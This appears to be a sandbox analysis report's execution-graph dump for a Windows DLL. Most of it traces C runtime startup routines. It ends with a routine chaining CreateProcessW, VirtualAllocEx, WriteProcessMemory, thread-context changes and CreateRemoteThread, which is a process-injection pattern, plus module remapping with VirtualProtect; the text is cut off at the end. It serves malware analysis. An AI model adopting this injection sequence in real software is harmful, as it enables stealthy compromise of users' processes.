                                                                                      Execution Graph

                                                                                      Execution Coverage:13%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:7.1%
                                                                                      Total number of Nodes:997
                                                                                      Total number of Limit Nodes:17
                                                                                      execution_graph 11078 6cf5edf4 11079 6cf5ee32 11078->11079 11080 6cf5edff 11078->11080 11117 6cf5ef4e 11079->11117 11082 6cf5ee24 11080->11082 11083 6cf5ee04 11080->11083 11090 6cf5ee47 11082->11090 11085 6cf5ee09 11083->11085 11086 6cf5ee1a 11083->11086 11089 6cf5ee0e 11085->11089 11104 6cf5f472 11085->11104 11109 6cf5f453 11086->11109 11091 6cf5ee53 ___scrt_is_nonwritable_in_current_image 11090->11091 11144 6cf5f4e3 11091->11144 11093 6cf5ee5a __DllMainCRTStartup@12 11094 6cf5ef46 11093->11094 11095 6cf5ee81 11093->11095 11101 6cf5eebd ___scrt_is_nonwritable_in_current_image CallUnexpected 11093->11101 11163 6cf5f682 IsProcessorFeaturePresent 11094->11163 11155 6cf5f445 11095->11155 11098 6cf5ef4d 11099 6cf5ee90 __RTC_Initialize 11099->11101 11158 6cf5f363 InitializeSListHead 11099->11158 11101->11089 11102 6cf5ee9e 11102->11101 11159 6cf5f41a 11102->11159 11255 6cf6468a 11104->11255 11560 6cf61b7c 11109->11560 11114 6cf5f46f 11114->11089 11115 6cf61b87 21 API calls 11116 6cf5f45c 11115->11116 11116->11089 11118 6cf5ef5a ___scrt_is_nonwritable_in_current_image __DllMainCRTStartup@12 11117->11118 11119 6cf5eff6 11118->11119 11120 6cf5ef8b 11118->11120 11136 6cf5ef63 11118->11136 11122 6cf5f682 __DllMainCRTStartup@12 4 API calls 11119->11122 11580 6cf5f4b3 11120->11580 11125 6cf5effd ___scrt_is_nonwritable_in_current_image 11122->11125 11123 6cf5ef90 11589 6cf5f36f 11123->11589 11126 6cf5f033 dllmain_raw 11125->11126 11128 6cf5f02e 11125->11128 11140 6cf5f019 11125->11140 11129 6cf5f04d dllmain_crt_dispatch 11126->11129 11126->11140 11127 6cf5ef95 __RTC_Initialize __DllMainCRTStartup@12 11592 6cf5f654 11127->11592 11601 6cf542c0 11128->11601 11129->11128 11129->11140 11135 6cf5f09f 11137 6cf5f0a8 dllmain_crt_dispatch 11135->11137 11135->11140 11136->11089 11138 6cf5f0bb dllmain_raw 11137->11138 11137->11140 11138->11140 11139 6cf542c0 __DllMainCRTStartup@12 5 API calls 11141 6cf5f086 11139->11141 11140->11089 11142 6cf5ef4e __DllMainCRTStartup@12 81 API calls 11141->11142 11143 6cf5f094 dllmain_raw 11142->11143 11143->11135 11145 6cf5f4ec 11144->11145 11167 6cf5f848 IsProcessorFeaturePresent 11145->11167 11149 6cf5f4fd 11150 6cf5f501 11149->11150 11177 6cf6466d 11149->11177 11150->11093 11153 6cf5f518 11153->11093 11249 6cf5f51c 11155->11249 11157 6cf5f44c 11157->11099 11158->11102 11160 6cf5f41f ___scrt_release_startup_lock 11159->11160 11161 6cf5f848 IsProcessorFeaturePresent 11160->11161 11162 6cf5f428 11160->11162 11161->11162 11162->11101 11164 6cf5f698 CallUnexpected std::bad_exception::bad_exception 11163->11164 11165 6cf5f743 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11164->11165 11166 6cf5f787 CallUnexpected 11165->11166 11166->11098 11168 6cf5f4f8 11167->11168 11169 6cf61b5d 11168->11169 11186 6cf6202c 11169->11186 11172 6cf61b66 11172->11149 11174 6cf61b6e 11175 6cf61b79 11174->11175 11200 6cf62068 11174->11200 11175->11149 11240 6cf66e9d 11177->11240 11180 6cf61b8f 11181 6cf61ba2 11180->11181 11182 6cf61b98 11180->11182 11181->11150 11183 6cf62011 ___vcrt_uninitialize_ptd 6 API calls 11182->11183 11184 6cf61b9d 11183->11184 11185 6cf62068 ___vcrt_uninitialize_locks DeleteCriticalSection 11184->11185 11185->11181 11189 6cf62035 11186->11189 11188 6cf6205e 11190 6cf62068 ___vcrt_uninitialize_locks DeleteCriticalSection 11188->11190 11189->11188 11191 6cf61b62 11189->11191 11204 6cf6265c 11189->11204 11190->11191 11191->11172 11192 6cf61fde 11191->11192 11221 6cf6256d 11192->11221 11195 6cf61ff3 11195->11174 11198 6cf6200e 11198->11174 11201 6cf62092 11200->11201 11202 6cf62073 11200->11202 11201->11172 11203 6cf6207d DeleteCriticalSection 11202->11203 11203->11201 11203->11203 11209 6cf62482 11204->11209 11207 6cf62694 InitializeCriticalSectionAndSpinCount 11208 6cf6267f 11207->11208 11208->11189 11210 6cf624a3 11209->11210 11211 6cf6249f 11209->11211 11210->11211 11212 6cf6250b GetProcAddress 11210->11212 11214 6cf624fc 11210->11214 11216 6cf62522 LoadLibraryExW 11210->11216 11211->11207 11211->11208 11212->11211 11214->11212 11215 6cf62504 FreeLibrary 11214->11215 11215->11212 11217 6cf62569 11216->11217 11218 6cf62539 GetLastError 11216->11218 11217->11210 11218->11217 11219 6cf62544 ___vcrt_FlsFree 11218->11219 11219->11217 11220 6cf6255a LoadLibraryExW 11219->11220 11220->11210 11222 6cf62482 ___vcrt_FlsFree 5 API calls 11221->11222 11223 6cf62587 11222->11223 11224 6cf625a0 TlsAlloc 11223->11224 11225 6cf61fe8 11223->11225 11225->11195 11226 6cf6261e 11225->11226 11227 6cf62482 ___vcrt_FlsFree 5 API calls 11226->11227 11228 6cf62638 11227->11228 11229 6cf62653 TlsSetValue 11228->11229 11230 6cf62001 11228->11230 11229->11230 11230->11198 11231 6cf62011 11230->11231 11232 6cf6201b 11231->11232 11233 6cf62021 11231->11233 11235 6cf625a8 11232->11235 11233->11195 11236 6cf62482 ___vcrt_FlsFree 5 API calls 11235->11236 11237 6cf625c2 11236->11237 11238 6cf625da TlsFree 11237->11238 11239 6cf625ce 11237->11239 11238->11239 11239->11233 11241 6cf66ead 11240->11241 11242 6cf5f50a 11240->11242 11241->11242 11244 6cf66d61 11241->11244 11242->11153 11242->11180 11246 6cf66d68 11244->11246 11245 6cf66dab GetStdHandle 11245->11246 11246->11245 11247 6cf66e0d 11246->11247 11248 6cf66dbe GetFileType 11246->11248 11247->11241 11248->11246 11250 6cf5f52c 11249->11250 11251 6cf5f528 11249->11251 11252 6cf5f539 ___scrt_release_startup_lock 11250->11252 11253 6cf5f682 __DllMainCRTStartup@12 4 API calls 11250->11253 11251->11157 11252->11157 11254 6cf5f5a2 11253->11254 11261 6cf64c0b 11255->11261 11258 6cf61b87 11540 6cf61f13 11258->11540 11262 6cf64c15 11261->11262 11265 6cf5f477 11261->11265 11269 6cf66aec 11262->11269 11265->11258 11285 6cf6698a 11269->11285 11271 6cf66b08 11272 6cf66b23 TlsGetValue 11271->11272 11273 6cf64c1c 11271->11273 11273->11265 11274 6cf66b2b 11273->11274 11275 6cf6698a __dosmaperr 5 API calls 11274->11275 11276 6cf66b47 11275->11276 11277 6cf66b65 TlsSetValue 11276->11277 11278 6cf64c2f 11276->11278 11279 6cf64ad2 11278->11279 11280 6cf64aed 11279->11280 11281 6cf64add 11279->11281 11280->11265 11299 6cf64af3 11281->11299 11286 6cf669ba 11285->11286 11290 6cf669b6 __dosmaperr 11285->11290 11286->11290 11291 6cf668bf 11286->11291 11289 6cf669d4 GetProcAddress 11289->11290 11290->11271 11297 6cf668d0 ___vcrt_FlsFree 11291->11297 11292 6cf66966 11292->11289 11292->11290 11293 6cf668ee LoadLibraryExW 11294 6cf6696d 11293->11294 11295 6cf66909 GetLastError 11293->11295 11294->11292 11296 6cf6697f FreeLibrary 11294->11296 11295->11297 11296->11292 11297->11292 11297->11293 11298 6cf6693c LoadLibraryExW 11297->11298 11298->11294 11298->11297 11300 6cf64b0e 11299->11300 11301 6cf64b08 11299->11301 11303 6cf650b0 ___free_lconv_mon 14 API calls 11300->11303 11302 6cf650b0 ___free_lconv_mon 14 API calls 11301->11302 11302->11300 11304 6cf64b1a 11303->11304 11305 6cf650b0 ___free_lconv_mon 14 API calls 11304->11305 11306 6cf64b25 11305->11306 11307 6cf650b0 ___free_lconv_mon 14 API calls 11306->11307 11308 6cf64b30 11307->11308 11309 6cf650b0 ___free_lconv_mon 14 API calls 11308->11309 11310 6cf64b3b 11309->11310 11311 6cf650b0 ___free_lconv_mon 14 API calls 11310->11311 11312 6cf64b46 11311->11312 11313 6cf650b0 ___free_lconv_mon 14 API calls 11312->11313 11314 6cf64b51 11313->11314 11315 6cf650b0 ___free_lconv_mon 14 API calls 11314->11315 11316 6cf64b5c 11315->11316 11317 6cf650b0 ___free_lconv_mon 14 API calls 11316->11317 11318 6cf64b67 11317->11318 11319 6cf650b0 ___free_lconv_mon 14 API calls 11318->11319 11320 6cf64b75 11319->11320 11331 6cf6491f 11320->11331 11325 6cf650b0 11326 6cf650bb HeapFree 11325->11326 11327 6cf650e5 11325->11327 11326->11327 11328 6cf650d0 GetLastError 11326->11328 11327->11280 11329 6cf650dd __dosmaperr 11328->11329 11471 6cf651d3 11329->11471 11332 6cf6492b ___scrt_is_nonwritable_in_current_image 11331->11332 11347 6cf65003 EnterCriticalSection 11332->11347 11335 6cf64935 11337 6cf650b0 ___free_lconv_mon 14 API calls 11335->11337 11338 6cf6495f 11335->11338 11337->11338 11348 6cf6497e 11338->11348 11339 6cf6498a 11340 6cf64996 ___scrt_is_nonwritable_in_current_image 11339->11340 11352 6cf65003 EnterCriticalSection 11340->11352 11342 6cf649a0 11353 6cf64bc0 11342->11353 11344 6cf649b3 11357 6cf649d3 11344->11357 11347->11335 11351 6cf6504b LeaveCriticalSection 11348->11351 11350 6cf6496c 11350->11339 11351->11350 11352->11342 11354 6cf64bcf __dosmaperr 11353->11354 11356 6cf64bf6 __dosmaperr 11353->11356 11354->11356 11360 6cf67920 11354->11360 11356->11344 11470 6cf6504b LeaveCriticalSection 11357->11470 11359 6cf649c1 11359->11325 11361 6cf679a0 11360->11361 11363 6cf67936 11360->11363 11364 6cf650b0 ___free_lconv_mon 14 API calls 11361->11364 11387 6cf679ee 11361->11387 11363->11361 11365 6cf67969 11363->11365 11368 6cf650b0 ___free_lconv_mon 14 API calls 11363->11368 11366 6cf679c2 11364->11366 11375 6cf650b0 ___free_lconv_mon 14 API calls 11365->11375 11386 6cf6798b 11365->11386 11367 6cf650b0 ___free_lconv_mon 14 API calls 11366->11367 11369 6cf679d5 11367->11369 11374 6cf6795e 11368->11374 11376 6cf650b0 ___free_lconv_mon 14 API calls 11369->11376 11370 6cf650b0 ___free_lconv_mon 14 API calls 11371 6cf67995 11370->11371 11377 6cf650b0 ___free_lconv_mon 14 API calls 11371->11377 11372 6cf67a5c 11378 6cf650b0 ___free_lconv_mon 14 API calls 11372->11378 11373 6cf679fc 11373->11372 11385 6cf650b0 14 API calls ___free_lconv_mon 11373->11385 11388 6cf67c3d 11374->11388 11380 6cf67980 11375->11380 11381 6cf679e3 11376->11381 11377->11361 11382 6cf67a62 11378->11382 11416 6cf67d3b 11380->11416 11384 6cf650b0 ___free_lconv_mon 14 API calls 11381->11384 11382->11356 11384->11387 11385->11373 11386->11370 11428 6cf67a91 11387->11428 11389 6cf67c4e 11388->11389 11390 6cf67d37 11388->11390 11391 6cf67c5f 11389->11391 11392 6cf650b0 ___free_lconv_mon 14 API calls 11389->11392 11390->11365 11393 6cf67c71 11391->11393 11395 6cf650b0 ___free_lconv_mon 14 API calls 11391->11395 11392->11391 11394 6cf67c83 11393->11394 11396 6cf650b0 ___free_lconv_mon 14 API calls 11393->11396 11397 6cf67c95 11394->11397 11398 6cf650b0 ___free_lconv_mon 14 API calls 11394->11398 11395->11393 11396->11394 11399 6cf67ca7 11397->11399 11400 6cf650b0 ___free_lconv_mon 14 API calls 11397->11400 11398->11397 11401 6cf67cb9 11399->11401 11403 6cf650b0 ___free_lconv_mon 14 API calls 11399->11403 11400->11399 11402 6cf67ccb 11401->11402 11404 6cf650b0 ___free_lconv_mon 14 API calls 11401->11404 11405 6cf67cdd 11402->11405 11406 6cf650b0 ___free_lconv_mon 14 API calls 11402->11406 11403->11401 11404->11402 11407 6cf67cef 11405->11407 11408 6cf650b0 ___free_lconv_mon 14 API calls 11405->11408 11406->11405 11409 6cf67d01 11407->11409 11411 6cf650b0 ___free_lconv_mon 14 API calls 11407->11411 11408->11407 11410 6cf67d13 11409->11410 11412 6cf650b0 ___free_lconv_mon 14 API calls 11409->11412 11413 6cf67d25 11410->11413 11414 6cf650b0 ___free_lconv_mon 14 API calls 11410->11414 11411->11409 11412->11410 11413->11390 11415 6cf650b0 ___free_lconv_mon 14 API calls 11413->11415 11414->11413 11415->11390 11417 6cf67d48 11416->11417 11427 6cf67da0 11416->11427 11419 6cf650b0 ___free_lconv_mon 14 API calls 11417->11419 11422 6cf67d58 11417->11422 11418 6cf67d6a 11421 6cf67d7c 11418->11421 11423 6cf650b0 ___free_lconv_mon 14 API calls 11418->11423 11419->11422 11420 6cf650b0 ___free_lconv_mon 14 API calls 11420->11418 11424 6cf67d8e 11421->11424 11425 6cf650b0 ___free_lconv_mon 14 API calls 11421->11425 11422->11418 11422->11420 11423->11421 11426 6cf650b0 ___free_lconv_mon 14 API calls 11424->11426 11424->11427 11425->11424 11426->11427 11427->11386 11429 6cf67a9e 11428->11429 11430 6cf67abd 11428->11430 11429->11430 11434 6cf67dc9 11429->11434 11430->11373 11433 6cf650b0 ___free_lconv_mon 14 API calls 11433->11430 11435 6cf67ab7 11434->11435 11436 6cf67dda 11434->11436 11435->11433 11437 6cf67da4 __dosmaperr 14 API calls 11436->11437 11438 6cf67de2 11437->11438 11439 6cf67da4 __dosmaperr 14 API calls 11438->11439 11440 6cf67ded 11439->11440 11441 6cf67da4 __dosmaperr 14 API calls 11440->11441 11442 6cf67df8 11441->11442 11443 6cf67da4 __dosmaperr 14 API calls 11442->11443 11444 6cf67e03 11443->11444 11445 6cf67da4 __dosmaperr 14 API calls 11444->11445 11446 6cf67e11 11445->11446 11447 6cf650b0 ___free_lconv_mon 14 API calls 11446->11447 11448 6cf67e1c 11447->11448 11449 6cf650b0 ___free_lconv_mon 14 API calls 11448->11449 11450 6cf67e27 11449->11450 11451 6cf650b0 ___free_lconv_mon 14 API calls 11450->11451 11452 6cf67e32 11451->11452 11453 6cf67da4 __dosmaperr 14 API calls 11452->11453 11454 6cf67e40 11453->11454 11455 6cf67da4 __dosmaperr 14 API calls 11454->11455 11456 6cf67e4e 11455->11456 11457 6cf67da4 __dosmaperr 14 API calls 11456->11457 11458 6cf67e5f 11457->11458 11459 6cf67da4 __dosmaperr 14 API calls 11458->11459 11460 6cf67e6d 11459->11460 11461 6cf67da4 __dosmaperr 14 API calls 11460->11461 11462 6cf67e7b 11461->11462 11463 6cf650b0 ___free_lconv_mon 14 API calls 11462->11463 11464 6cf67e86 11463->11464 11465 6cf650b0 ___free_lconv_mon 14 API calls 11464->11465 11466 6cf67e91 11465->11466 11467 6cf650b0 ___free_lconv_mon 14 API calls 11466->11467 11468 6cf67e9c 11467->11468 11469 6cf650b0 ___free_lconv_mon 14 API calls 11468->11469 11469->11435 11470->11359 11474 6cf64d88 GetLastError 11471->11474 11473 6cf651d8 11473->11327 11475 6cf64d9e 11474->11475 11476 6cf64da4 11474->11476 11477 6cf66aec __dosmaperr 6 API calls 11475->11477 11478 6cf66b2b __dosmaperr 6 API calls 11476->11478 11479 6cf64da8 SetLastError 11476->11479 11477->11476 11480 6cf64dc0 11478->11480 11479->11473 11480->11479 11497 6cf651e6 11480->11497 11484 6cf64dee 11487 6cf66b2b __dosmaperr 6 API calls 11484->11487 11485 6cf64ddd 11486 6cf66b2b __dosmaperr 6 API calls 11485->11486 11488 6cf64deb 11486->11488 11489 6cf64dfa 11487->11489 11493 6cf650b0 ___free_lconv_mon 12 API calls 11488->11493 11490 6cf64e15 11489->11490 11491 6cf64dfe 11489->11491 11504 6cf64a39 11490->11504 11492 6cf66b2b __dosmaperr 6 API calls 11491->11492 11492->11488 11493->11479 11496 6cf650b0 ___free_lconv_mon 12 API calls 11496->11479 11502 6cf651f3 __dosmaperr 11497->11502 11498 6cf65233 11501 6cf651d3 __dosmaperr 13 API calls 11498->11501 11499 6cf6521e HeapAlloc 11500 6cf64dd5 11499->11500 11499->11502 11500->11484 11500->11485 11501->11500 11502->11498 11502->11499 11509 6cf63935 11502->11509 11518 6cf648cd 11504->11518 11512 6cf63961 11509->11512 11513 6cf6396d ___scrt_is_nonwritable_in_current_image 11512->11513 11514 6cf65003 CallUnexpected EnterCriticalSection 11513->11514 11515 6cf63978 CallUnexpected 11514->11515 11516 6cf639af __dosmaperr LeaveCriticalSection 11515->11516 11517 6cf63940 11516->11517 11517->11502 11519 6cf648d9 ___scrt_is_nonwritable_in_current_image 11518->11519 11532 6cf65003 EnterCriticalSection 11519->11532 11521 6cf648e3 11533 6cf64913 11521->11533 11524 6cf649df 11525 6cf649eb ___scrt_is_nonwritable_in_current_image 11524->11525 11536 6cf65003 EnterCriticalSection 11525->11536 11527 6cf649f5 11528 6cf64bc0 __dosmaperr 14 API calls 11527->11528 11529 6cf64a0d 11528->11529 11537 6cf64a2d 11529->11537 11532->11521 11534 6cf6504b CallUnexpected LeaveCriticalSection 11533->11534 11535 6cf64901 11534->11535 11535->11524 11536->11527 11538 6cf6504b CallUnexpected LeaveCriticalSection 11537->11538 11539 6cf64a1b 11538->11539 11539->11496 11541 6cf5f47c 11540->11541 11542 6cf61f1d 11540->11542 11541->11089 11548 6cf625e3 11542->11548 11545 6cf6261e ___vcrt_FlsSetValue 6 API calls 11546 6cf61f33 11545->11546 11553 6cf61ef7 11546->11553 11549 6cf62482 ___vcrt_FlsFree 5 API calls 11548->11549 11550 6cf625fd 11549->11550 11551 6cf62615 TlsGetValue 11550->11551 11552 6cf61f24 11550->11552 11551->11552 11552->11545 11554 6cf61f01 11553->11554 11555 6cf61f0e 11553->11555 11554->11555 11557 6cf639c3 11554->11557 11555->11541 11558 6cf650b0 ___free_lconv_mon 14 API calls 11557->11558 11559 6cf639db 11558->11559 11559->11555 11566 6cf61f4c 11560->11566 11562 6cf5f458 11562->11116 11563 6cf6467f 11562->11563 11564 6cf64d88 __dosmaperr 14 API calls 11563->11564 11565 6cf5f464 11564->11565 11565->11114 11565->11115 11567 6cf61f55 11566->11567 11568 6cf61f58 GetLastError 11566->11568 11567->11562 11569 6cf625e3 ___vcrt_FlsGetValue 6 API calls 11568->11569 11570 6cf61f6d 11569->11570 11571 6cf61f8c 11570->11571 11572 6cf61fd2 SetLastError 11570->11572 11573 6cf6261e ___vcrt_FlsSetValue 6 API calls 11570->11573 11571->11572 11572->11562 11574 6cf61f86 __CreateFrameInfo 11573->11574 11574->11571 11575 6cf61fae 11574->11575 11577 6cf6261e ___vcrt_FlsSetValue 6 API calls 11574->11577 11576 6cf6261e ___vcrt_FlsSetValue 6 API calls 11575->11576 11578 6cf61fc2 11575->11578 11576->11578 11577->11575 11579 6cf639c3 ___vcrt_freefls@4 14 API calls 11578->11579 11579->11571 11581 6cf5f4b8 ___scrt_release_startup_lock 11580->11581 11582 6cf5f4bc 11581->11582 11584 6cf5f4c8 __DllMainCRTStartup@12 11581->11584 11605 6cf644e9 11582->11605 11586 6cf5f4d5 11584->11586 11609 6cf63cd2 11584->11609 11585 6cf5f4c6 11585->11123 11586->11123 11678 6cf61b3a InterlockedFlushSList 11589->11678 11593 6cf5f660 11592->11593 11594 6cf5efb4 11593->11594 11682 6cf64692 11593->11682 11598 6cf5eff0 11594->11598 11596 6cf5f66e 11597 6cf61b8f ___scrt_uninitialize_crt 7 API calls 11596->11597 11597->11594 11796 6cf5f4d6 11598->11796 11604 6cf542eb 11601->11604 11603 6cf54813 11603->11135 11603->11139 11813 6cf5ed80 11604->11813 11606 6cf644f5 __EH_prolog3 11605->11606 11620 6cf643b4 11606->11620 11608 6cf6451c __DllMainCRTStartup@12 11608->11585 11610 6cf63d10 11609->11610 11611 6cf63cff 11609->11611 11644 6cf63b9d 11610->11644 11637 6cf63d9a GetModuleHandleW 11611->11637 11616 6cf63d4e 11616->11123 11621 6cf643c0 ___scrt_is_nonwritable_in_current_image 11620->11621 11628 6cf65003 EnterCriticalSection 11621->11628 11623 6cf643ce 11629 6cf6440f 11623->11629 11628->11623 11630 6cf643db 11629->11630 11631 6cf6442e 11629->11631 11633 6cf64403 11630->11633 11631->11630 11632 6cf650b0 ___free_lconv_mon 14 API calls 11631->11632 11632->11630 11636 6cf6504b LeaveCriticalSection 11633->11636 11635 6cf643ec 11635->11608 11636->11635 11638 6cf63d04 11637->11638 11638->11610 11639 6cf63df5 GetModuleHandleExW 11638->11639 11640 6cf63e34 GetProcAddress 11639->11640 11641 6cf63e48 11639->11641 11640->11641 11642 6cf63e64 11641->11642 11643 6cf63e5b FreeLibrary 11641->11643 11642->11610 11643->11642 11645 6cf63ba9 ___scrt_is_nonwritable_in_current_image 11644->11645 11659 6cf65003 EnterCriticalSection 11645->11659 11647 6cf63bb3 11660 6cf63bea 11647->11660 11649 6cf63bc0 11664 6cf63bde 11649->11664 11652 6cf63d69 11668 6cf63ddc 11652->11668 11654 6cf63d73 11655 6cf63d87 11654->11655 11656 6cf63d77 GetCurrentProcess TerminateProcess 11654->11656 11657 6cf63df5 CallUnexpected 3 API calls 11655->11657 11656->11655 11658 6cf63d8f ExitProcess 11657->11658 11659->11647 11661 6cf63bf6 ___scrt_is_nonwritable_in_current_image CallUnexpected 11660->11661 11662 6cf63c5a CallUnexpected 11661->11662 11663 6cf644e9 __DllMainCRTStartup@12 14 API calls 11661->11663 11662->11649 11663->11662 11667 6cf6504b LeaveCriticalSection 11664->11667 11666 6cf63bcc 11666->11616 11666->11652 11667->11666 11671 6cf6510f 11668->11671 11670 6cf63de1 CallUnexpected 11670->11654 11672 6cf6511e CallUnexpected 11671->11672 11673 6cf6512b 11672->11673 11675 6cf66a0f 11672->11675 11673->11670 11676 6cf6698a __dosmaperr 5 API calls 11675->11676 11677 6cf66a2b 11676->11677 11677->11673 11679 6cf61b4a 11678->11679 11680 6cf5f379 11678->11680 11679->11680 11681 6cf639c3 ___vcrt_freefls@4 14 API calls 11679->11681 11680->11127 11681->11679 11683 6cf646af ___scrt_uninitialize_crt 11682->11683 11684 6cf6469d 11682->11684 11683->11596 11685 6cf646ab 11684->11685 11687 6cf67548 11684->11687 11685->11596 11690 6cf673d9 11687->11690 11693 6cf6732d 11690->11693 11694 6cf67339 ___scrt_is_nonwritable_in_current_image 11693->11694 11701 6cf65003 EnterCriticalSection 11694->11701 11696 6cf673af 11710 6cf673cd 11696->11710 11700 6cf67343 ___scrt_uninitialize_crt 11700->11696 11702 6cf672a1 11700->11702 11701->11700 11703 6cf672ad ___scrt_is_nonwritable_in_current_image 11702->11703 11713 6cf67665 EnterCriticalSection 11703->11713 11705 6cf672f0 11727 6cf67321 11705->11727 11706 6cf672b7 ___scrt_uninitialize_crt 11706->11705 11714 6cf674e3 11706->11714 11795 6cf6504b LeaveCriticalSection 11710->11795 11712 6cf673bb 11712->11685 11713->11706 11715 6cf674f8 ___std_exception_copy 11714->11715 11716 6cf674ff 11715->11716 11717 6cf6750a 11715->11717 11718 6cf673d9 ___scrt_uninitialize_crt 68 API calls 11716->11718 11730 6cf6747a 11717->11730 11721 6cf67505 11718->11721 11754 6cf63554 11721->11754 11725 6cf6752b 11743 6cf68d04 11725->11743 11794 6cf67679 LeaveCriticalSection 11727->11794 11729 6cf6730f 11729->11700 11731 6cf67493 11730->11731 11735 6cf674ba 11730->11735 11732 6cf6787c ___scrt_uninitialize_crt 39 API calls 11731->11732 11731->11735 11733 6cf674af 11732->11733 11760 6cf69523 11733->11760 11735->11721 11736 6cf6787c 11735->11736 11737 6cf6789d 11736->11737 11738 6cf67888 11736->11738 11737->11725 11739 6cf651d3 __dosmaperr 14 API calls 11738->11739 11740 6cf6788d 11739->11740 11771 6cf63818 11740->11771 11744 6cf68d15 11743->11744 11745 6cf68d22 11743->11745 11746 6cf651d3 __dosmaperr 14 API calls 11744->11746 11747 6cf68d6b 11745->11747 11751 6cf68d49 11745->11751 11750 6cf68d1a 11746->11750 11748 6cf651d3 __dosmaperr 14 API calls 11747->11748 11749 6cf68d70 11748->11749 11753 6cf63818 ___std_exception_copy 39 API calls 11749->11753 11750->11721 11774 6cf68c62 11751->11774 11753->11750 11755 6cf63560 11754->11755 11757 6cf63577 11755->11757 11787 6cf635ff 11755->11787 11758 6cf6358a 11757->11758 11759 6cf635ff ___std_exception_copy 39 API calls 11757->11759 11758->11705 11759->11758 11761 6cf6952f ___scrt_is_nonwritable_in_current_image 11760->11761 11762 6cf69570 11761->11762 11763 6cf695b6 11761->11763 11770 6cf69537 11761->11770 11764 6cf6379b ___std_exception_copy 39 API calls 11762->11764 11765 6cf68b21 ___scrt_uninitialize_crt EnterCriticalSection 11763->11765 11764->11770 11766 6cf695bc 11765->11766 11767 6cf695da 11766->11767 11768 6cf69634 ___scrt_uninitialize_crt 62 API calls 11766->11768 11769 6cf6962c ___scrt_uninitialize_crt LeaveCriticalSection 11767->11769 11768->11767 11769->11770 11770->11735 11772 6cf63764 ___std_exception_copy 39 API calls 11771->11772 11773 6cf63824 11772->11773 11773->11725 11775 6cf68c6e ___scrt_is_nonwritable_in_current_image 11774->11775 11776 6cf68b21 ___scrt_uninitialize_crt EnterCriticalSection 11775->11776 11777 6cf68c7d 11776->11777 11778 6cf68bf8 ___scrt_uninitialize_crt 39 API calls 11777->11778 11786 6cf68cc2 11777->11786 11780 6cf68ca9 FlushFileBuffers 11778->11780 11779 6cf651d3 __dosmaperr 14 API calls 11781 6cf68cc9 11779->11781 11780->11781 11782 6cf68cb5 GetLastError 11780->11782 11783 6cf68cf8 ___scrt_uninitialize_crt LeaveCriticalSection 11781->11783 11784 6cf651c0 __dosmaperr 14 API calls 11782->11784 11785 6cf68ce1 11783->11785 11784->11786 11785->11750 11786->11779 11788 6cf63612 11787->11788 11789 6cf63609 11787->11789 11788->11757 11790 6cf635b9 ___std_exception_copy 16 API calls 11789->11790 11791 6cf6360e 11790->11791 11791->11788 11792 6cf6476a CallUnexpected 39 API calls 11791->11792 11793 6cf6361b 11792->11793 11794->11729 11795->11712 11801 6cf646c2 11796->11801 11799 6cf62011 ___vcrt_uninitialize_ptd 6 API calls 11800 6cf5eff5 11799->11800 11800->11136 11804 6cf64f08 11801->11804 11805 6cf64f12 11804->11805 11806 6cf5f4dd 11804->11806 11808 6cf66aad 11805->11808 11806->11799 11809 6cf6698a __dosmaperr 5 API calls 11808->11809 11810 6cf66ac9 11809->11810 11811 6cf66ae4 TlsFree 11810->11811 11812 6cf66ad2 11810->11812 11812->11806 11814 6cf5ed89 IsProcessorFeaturePresent 11813->11814 11815 6cf5ed88 11813->11815 11817 6cf5f194 11814->11817 11815->11603 11820 6cf5f157 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11817->11820 11819 6cf5f277 11819->11603 11820->11819 11847 6cf4c4f0 11867 6cf4c510 std::bad_exception::bad_exception 11847->11867 11848 6cf539bd CloseHandle 11848->11867 11849 6cf53a13 11850 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 11849->11850 11851 6cf53a1d 11850->11851 11852 6cf5393f Wow64SetThreadContext ResumeThread 11852->11867 11853 6cf52181 VirtualAllocEx 11853->11867 11854 6cf5330c WriteProcessMemory 11854->11867 11855 6cf53e7f VirtualAllocEx 11855->11867 11856 6cf51ef4 CreateProcessW 11856->11867 11857 6cf52ea0 ReadProcessMemory 11857->11867 11858 6cf539e1 CloseHandle 11858->11867 11859 6cf51cea VirtualAlloc 11859->11867 11860 6cf52669 WriteProcessMemory 11860->11867 11861 6cf523bd WriteProcessMemory 11861->11867 11862 6cf54235 CreateRemoteThread 11862->11867 11863 6cf5236d VirtualAllocEx 11863->11867 11864 6cf52095 Wow64GetThreadContext 11864->11867 11865 6cf51bc9 GetConsoleWindow ShowWindow 11876 6cf4a540 11865->11876 11867->11848 11867->11849 11867->11852 11867->11853 11867->11854 11867->11855 11867->11856 11867->11857 11867->11858 11867->11859 11867->11860 11867->11861 11867->11862 11867->11863 11867->11864 11867->11865 11868 6cf4a540 21 API calls 11867->11868 11870 6cf540c3 WriteProcessMemory 11867->11870 11872 6cf5379f CreateRemoteThread 11867->11872 11873 6cf53f06 WriteProcessMemory 11867->11873 11875 6cf52fdd WriteProcessMemory 11867->11875 11899 6cf4bea0 GetModuleHandleW 11867->11899 11905 6cf4a380 11867->11905 11868->11867 11870->11867 11872->11867 11874 6cf53fbb 11873->11874 11874->11867 11875->11867 11893 6cf4a5a7 __InternalCxxFrameHandler 11876->11893 11877 6cf4b0bc CloseHandle 11877->11893 11878 6cf4ae1a CreateFileA 11878->11893 11879 6cf4b747 CloseHandle 11879->11893 11880 6cf4b96c VirtualProtect 11881 6cf4ba16 __InternalCxxFrameHandler 11880->11881 11881->11893 11882 6cf4b852 11883 6cf5ed80 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 11882->11883 11884 6cf4b85c 11883->11884 11884->11867 11885 6cf4b76f CloseHandle CloseHandle 11885->11893 11886 6cf4add8 GetModuleFileNameA 11886->11893 11887 6cf4b67c VirtualProtect 11887->11893 11888 6cf4ad9b K32GetModuleInformation 11888->11893 11889 6cf4b1a8 MapViewOfFile 11889->11893 11890 6cf4b872 GetCurrentProcess 11891 6cf5fb20 std::bad_exception::bad_exception 11890->11891 11892 6cf4b8b3 GetModuleHandleA 11891->11892 11892->11893 11893->11877 11893->11878 11893->11879 11893->11880 11893->11882 11893->11885 11893->11886 11893->11887 11893->11888 11893->11889 11893->11890 11894 6cf4b56f VirtualProtect 11893->11894 11895 